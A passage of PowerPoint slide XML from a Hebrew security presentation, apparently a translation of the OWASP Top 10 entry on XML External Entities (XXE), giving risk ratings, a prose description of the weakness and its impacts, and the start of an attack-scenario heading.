      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="166209"/>
            <a:ext cx="5486400" cy="670376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    ישויות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> חיצוניות -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844663003"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="947067"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="555099">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="287869">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניצול: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גלוי: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1259432">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תוקפים עשויים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לנצל תהליכי עיבוד </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> פגיעים במידה והם מסוגלים להעלות קובץ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> או לצרף תוכן זדוני לתוך מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, לנצל קוד פגיע, תלויות או תהליכי מיזוג.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כברירת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מחדל, תהליכי עיבוד </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ישנים רבים מאפשרים להצביע על ישויות חיצוניות, הצבעה חוזרת על </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>URI</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בעת תהליך העיבוד.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כלי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> עשויים לגלות בעיה זו ע"י בחינת התלויות וההגדרות. כלי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מחייבים תהליכים ידניים לגילוי וניצול בעיה זו. בדיקות ידניות מחייבות לימוד כיצד למצוא חולשות כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, מכיוון שחולשה זו פחות שכיחה החל משנת 2017.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חולשה זו עשויה להיות מנוצלת לחילוץ מידע, הרצת קוד זדוני מרחוק לכיוון השרת, סריקת מערכות פנימיות, ביצוע מתקפות מניעת שירות, וכו הרצת מתקפות נוספות.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה העסקית תלויה בדרישות האבטחה של היישום והמידע.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26307283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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> היישום משתמש במידע בלתי מאומת בקריאת </a:t>
            </a:r>
            <a:r>
